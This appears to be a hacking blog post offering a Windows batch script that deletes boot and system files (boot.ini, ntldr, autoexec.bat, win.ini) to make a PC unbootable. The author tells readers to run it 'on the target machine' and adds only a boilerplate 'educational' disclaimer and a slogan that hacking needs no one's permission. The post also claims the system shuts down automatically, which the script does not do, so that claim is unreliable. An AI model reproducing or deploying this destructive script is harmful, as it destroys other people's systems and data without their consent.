Crashing a PC forever is one of the all-time
favorite of the bad guys. All you need to do is run a simple script which
delete’s some important files required for the windows to run. Crashing a pc
forever is tested on windows xp which might or might not work on newer versions
of windows. Recent versions of windows can detect such kind of malicious
activities. Here we are going to use notepad to make a virus which is kind of destructible. All you need to do is copy
the script that I provided below and save it as .bat file and execute on the
target machine.
THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Code for Crashing a PC forever:
[/code][/b]
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h
c:\windows\win.ini
del c:\windows\win.ini
Now save it as filename.bat
Now you can run this on any system or
pc, system will shut down automatically, the files mentioned in the code will
get deleted making the system unable to start.
Note: DO NOT OPEN THE FILE
So, how do I get the infected system to work?
Pretty much simple, just format the pc
and reinstall the operating system or you can try repairing the operating
system with installation media.
========== Hacking Don't Need Agreements ==========
Just Remember One Thing You Don't Need To Seek Anyone's Permission To Hack Anything Or Anyone As Long As It Is Ethical, This Is The Main Principle Of Hacking Dream
Thank You for Reading My Post, I Hope It Will Be Useful For You
I Will Be Very Happy To Help You So For Queries or Any Problem Comment Below Or You Can Mail Me At BhanuHacks@gmail.com
No comments:
Post a Comment